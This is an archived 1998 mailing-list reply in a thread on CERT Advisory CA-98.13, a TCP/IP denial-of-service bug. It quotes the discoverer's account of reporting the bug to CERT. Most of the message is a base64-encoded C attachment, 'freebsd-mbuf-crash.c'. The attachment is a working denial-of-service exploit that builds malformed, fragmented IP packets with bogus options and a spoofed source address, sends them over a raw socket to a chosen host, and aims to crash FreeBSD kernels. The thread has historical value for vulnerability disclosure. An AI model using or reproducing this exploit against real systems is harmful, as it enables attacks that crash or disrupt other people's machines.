Re: CERT Advisory CA-98.13 - TCP/IP Denial of Service

From: Jeff Roberson (jrobersonat_private)
Date: Mon Dec 28 1998 - 15:59:34 PST

Next message: Jason Ackley: "Oracle8 TNSLSNR DoS"

Previous message: David G. Andersen: "A few more fingerprinting techniques - time and netmask"
Maybe in reply to: aleph1at_private: "CERT Advisory CA-98.13 - TCP/IP Denial of Service"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to mimeat_private for more info.

--0-1938059902-914889574=:20814
Content-Type: TEXT/PLAIN; charset=US-ASCII

Here is some exploit code I wrote a while back.  It hardly ever crashes
BSD because the conditions required for the bug to work are out of our
controll.

Jeff

On Thu, 24 Dec 1998, Guido van Rooij wrote:

> On Wed, Dec 23, 1998 at 11:17:48AM +0100, Ulf Munkedal wrote:
> > Have I missed something on the list lately about these illegal packets that
> > CERT are adressing ("constructing a sequence of packets with certain
> > characteristics, an intruder can cause vulnerable systems to crash, hang,
> > or behave in unpredictable ways")?
> >
> > Or is this just the old teardrop/newtear/boink/bonk/nestea2 problem that
> > they are talking about?
> >
>
> No. This is an entirely new problem. It was discovered by me after a bug
> report for an SMP FreeBSD system. Since I know it is only a matter
> of time before such a bug would be abused, I decided to inform
> CERT (also because the problem has been present since at least the
> BSD Net/2 release). No public exploits are known to me.
>
> -Guido
>
--0-1938059902-914889574=:20814
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="freebsd-mbuf-crash.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.BSI.3.91.981228185934.20814Bat_private>
Content-Description:

LyogZnJlZWJzZC1tYnVmLWNyYXNoLmMgYnkgSmVmZiBSb2JlcnNvbiwgKGpl
ZmZyQG53bGluay5jb20pLiBEZWMgMTEgMTk5OC4gDQogKiBJJ20gb25seSBy
ZWxlYXNpbmcgdGhpcyBhcyBhbiBleGFtcGxlIGJlY2F1c2UgdGhlIGJ1ZyBo
YXJkbHkgZXZlciByZWxpYWJseSBjcmFzaGVzIGEgbWFjaGluZS4NCiAqLw0K
DQojaW5jbHVkZSA8c3RkaW8uaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCiNp
bmNsdWRlIDxuZXRpbmV0L2lwLmg+DQojZGVmaW5lIF9fRkFWT1JfQlNEDQoj
aW5jbHVkZSA8bmV0aW5ldC90Y3AuaD4NCiNpbmNsdWRlIDxuZXRpbmV0L2lu
Lmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPGFycGEv
aW5ldC5oPg0KI2luY2x1ZGUgPG5ldGRiLmg+DQojaW5jbHVkZSA8c3RyaW5n
cy5oPg0KDQoNCnVfbG9uZyBodG9uYShjaGFyICpob3N0KQ0Kew0KCXVfbG9u
ZwlhZGRyOw0KCXN0cnVjdAlob3N0ZW50ICpocDsNCg0KCWlmICgoYWRkcj1p
bmV0X2FkZHIoaG9zdCkpID09IElOQUREUl9OT05FKSB7DQoJCWlmICgoaHAg
PSBnZXRob3N0YnluYW1lKGhvc3QpKSA9PSBOVUxMKQ0KCQkJcmV0dXJuKC0x
KTsNCgkJYmNvcHkoaHAtPmhfYWRkcl9saXN0WzBdLCAmYWRkciwgc2l6ZW9m
KGFkZHIpKTsNCgl9CQ0KCXJldHVybihhZGRyKTsNCn0NCg0KaW50IG1haW4o
aW50IGFyZ2MsIGNoYXIqIGFyZ3ZbXSkNCnsNCgljaGFyCWJ1ZlsxMjhdOw0K
CXN0cnVjdAlpcCAqaXBoID0gKHN0cnVjdCBpcCAqKWJ1ZjsJDQoJdV9jaGFy
CSppcG9wdGlvbnMgPSAodV9jaGFyICopKGJ1ZiArIHNpemVvZihzdHJ1Y3Qg
aXApKTsNCglzdHJ1Y3QJdGNwaGRyICp0Y3BoID0gKHN0cnVjdCB0Y3BoZHIg
KikoYnVmICsgNjApOw0KCWludAlzLCBpOw0KCXN0cnVjdAlzb2NrYWRkcl9p
biBzaW47DQoNCglpZiAoYXJnYyAhPSAyKSB7DQoJCXByaW50ZigidXNhZ2Vc
blx0JXMgPGhvc3Q+XG4iLCBhcmd2WzBdKTsNCgkJZXhpdCgxKTsNCgl9DQoJ
cyA9IHNvY2tldChBRl9JTkVULCBTT0NLX1JBVywgSVBQUk9UT19SQVcpOw0K
CWlmIChzIDwgMCkgew0KCQlwZXJyb3IoInNvY2tldCIpOw0KCQlleGl0KDEp
Ow0KCX0NCglzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQoJc2luLnNpbl9w
b3J0ID0gaHRvbnMoNyk7DQoJc2luLnNpbl9hZGRyLnNfYWRkciA9IGh0b25h
KGFyZ3ZbMV0pOw0KCWlmIChzaW4uc2luX2FkZHIuc19hZGRyID09IC0xKSB7
DQoJCXByaW50ZigiRXJyb3IgcmVzb2x2aW5nICVzXG4iLCBhcmd2WzFdKTsN
CgkJZXhpdCgxKTsNCgl9DQoNCgliemVybyhidWYsIHNpemVvZihidWYpKTsN
CglpcGgtPmlwX2hsPTE1Ow0KCWlwaC0+aXBfdj00Ow0KCWlwaC0+aXBfbGVu
PWh0b25zKDEyNCk7DQoJaXBoLT5pcF9pZD0gaHRvbnMoZ2V0cGlkKCkpOw0K
CWlwaC0+aXBfb2ZmPSBodG9ucyhJUF9NRik7DQoJaXBoLT5pcF90dGwgPSAy
NTU7DQoJaXBoLT5pcF9wID0gSVBQUk9UT19UQ1A7DQoJYmNvcHkoJnNpbi5z
aW5fYWRkci5zX2FkZHIsICZpcGgtPmlwX2RzdCwgc2l6ZW9mKHVfbG9uZykp
Ow0KCWlwaC0+aXBfc3JjLnNfYWRkciA9IGh0b25hKCIxMC4yLjMuNCIpOw0K
CWZvciAoaSA9IDA7IGkgPCAyMDtpKyspIHsNCgkJaXBvcHRpb25zW2ldPTB4
ZmY7DQoJfQ0KCWlwb3B0aW9uc1swXSA9IDB4ZmY7IC8qIE1hZGUgdXAgb3B0
aW9uICovICANCglpcG9wdGlvbnNbMV0gPSAweDFhOw0KCW1lbXNldCgoY2hh
ciAqKSZpcG9wdGlvbnNbMl0sIDB4ZmYsIDM3KTsNCglpcG9wdGlvbnNbMzld
ID0gMTsgIC8qIElQX05PUCAqLw0KCXRjcGgtPnRoX3Nwb3J0ID0gaHRvbnMo
NTUwNSk7DQoJdGNwaC0+dGhfZHBvcnQgPSBodG9ucygyMyk7DQoJdGNwaC0+
dGhfc2VxID0gaHRvbmwoMHhhYmNkZTEyMyk7DQoJdGNwaC0+dGhfYWNrID0g
aHRvbmwoMHgzMjFlZGNiYSk7DQoJdGNwaC0+dGhfZmxhZ3MgPSBUSF9BQ0sg
fCBUSF9QVVNIOw0KCXRjcGgtPnRoX3dpbiA9IGh0b25zKDB4MTIzNCk7DQoN
CglpZiAoc2VuZHRvKHMsIGJ1ZiwgMTI0LCAwLCAoc3RydWN0IHNvY2thZGRy
ICopJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpIDwgMTI0KSB7DQoJ
CXBlcnJvcigic2VuZHRvIik7DQoJCWV4aXQoMSk7DQoJfQ0KCWlmIChzZW5k
dG8ocywgYnVmLCAxMjQsIDAsIChzdHJ1Y3Qgc29ja2FkZHIgKikmc2luLCBz
aXplb2Yoc3RydWN0IHNvY2thZGRyKSkgPCAxMjQpIHsJDQoJCXBlcnJvcigi
c2VuZHRvIik7DQoJCWV4aXQoMSk7DQoJfQ0KCWlwaC0+aXBfbGVuID0gaHRv
bnMoODApOw0KCWlwaC0+aXBfb2ZmID0gaHRvbnMoOCk7DQoJaWYgKHNlbmR0
byhzLCBidWYsIDgwLCAwLCAoc3RydWN0IHNvY2thZGRyICopJnNpbiwgc2l6
ZW9mKHN0cnVjdCBzb2NrYWRkcikpIDwgNjApIHsNCgkJcGVycm9yKCJzZW5k
dG8iKTsNCgkJZXhpdCgxKTsNCgl9DQoJZXhpdCgwKTsNCn0NCg==
--0-1938059902-914889574=:20814--

Next message: Jason Ackley: "Oracle8 TNSLSNR DoS"
Previous message: David G. Andersen: "A few more fingerprinting techniques - time and netmask"
Maybe in reply to: aleph1at_private: "CERT Advisory CA-98.13 - TCP/IP Denial of Service"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:26:32 PDT